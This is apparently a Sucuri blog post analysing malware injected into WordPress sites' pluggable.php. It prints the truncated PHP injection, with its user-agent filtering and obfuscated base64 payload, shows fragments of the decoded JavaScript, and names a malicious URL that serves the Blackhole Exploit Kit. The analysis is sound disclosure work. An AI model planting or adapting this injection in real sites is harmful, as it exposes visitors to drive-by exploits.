WordPress Pluggable.php Being Compromised

The last few days we have seen a large number of WordPress sites compromised with a hidden malware payload that lands inside wp-includes/pluggable.php. This is not a WordPress vulnerability, WordPress is simply being targeted as the host.

WordPress pluggable.php

This malware is not new and we have been seeing variations of it since June, 2012. However, for the last few days the number of sites compromised have multiplied, prompting this post.

We are still tracking down how the sites are getting hacked, but so far we noticed a few similarities between them.

What’s Happening?


This is what gets added to pluggable.php typically at line 810-811:

$__name = "RANDOMMD5";
if(1>0 AND !preg_match("#(Firefox.3)|(opera)|(chrome)|..(wget)|(yahoo)|(yandex)#i”, $_SERVER[“HTTP_USER_AGENT”]) AND empty ($_COOKIE[$__name])) {
error_reporting(0);
$date = date(“D, j M Y 00:00:00″, time()+60*60*24*30);
$cookie = time().”.”.rand(1111111, 9999999);
echo "<script type=\"text/javascript\">document.cookie = \””.$__name.”=\”+escape(‘”.$cookie.”‘)+\”; expires=”.$date.”; path=/\”;“;
$__f = implode(“”, array_map(“chr”, explode(” “, “98 97 115 101 54 52 95 100 101 99 111 100 101″)));
echo $__f("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmluc..

If you are not familiar with PHP, this is conditional malware. The code checks the browser of the person visiting the site, and only displays if a few conditions are met: Browser (user agent) must not be Opera, Chrome, or Firefox 3, and traffic should not originate from a search engine (Google, Yahoo, etc).

Decode and Analyze


When you look at all the exclusions, it seems the malware is focusing on Windows users running Internet Explorer, or new versions of Firefox. After decoding the malware, we understand why. The following javaScript is executed in the browser:

<script type="text/javascript">document.cookie = "db6c..eed1f235454f7
="+escape(‘123.456′)+”; expires=Fri, 14 Sep 2012 00:00:00; path=/”..
<script type="text/javascript">pal=0; pal-=5884; his=0.0034;his–;wax=7474;i
f(wax>0.0101){was=0.0106;cap=0.0359;if(cap<7740){hon=7;hon++}}kue=23;if..

This is fully random and changes per site. Often the payload starts as:

kos=26;   kos+=8147;zag=2832;pic=17;pic++;ins=..

or

ama=0.001;  if(ama>0){you=7336;you-=7397;chi=11;chi++}dun=0.035;dun–;pah=2404;pah–;

or

vac=0.0012;if(vac==0.0075){irk=null}foy=null;kop=9;kop+=17;bid=sea

Where’s it start


There are many other variations. Once decoded it attempts to load additional exploit code from:

http://qckdqxeu.co.tv/ckp2wnzxwiwrq41

From there it tries to exploit the user using the Blackhole Exploit Kit. Be advised that there are other domains in the .co.tv TLD doing the same thing, it is not limited to the one we’re pointing out. More to come on that!

This exploit kit focuses on Windows vulnerabilities, and it also shows a slight increase on the AVG Threat Labs page for the Phoenix Exploit Kit.

As always, we will post more details when we have it.

Scan your website for free:
About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid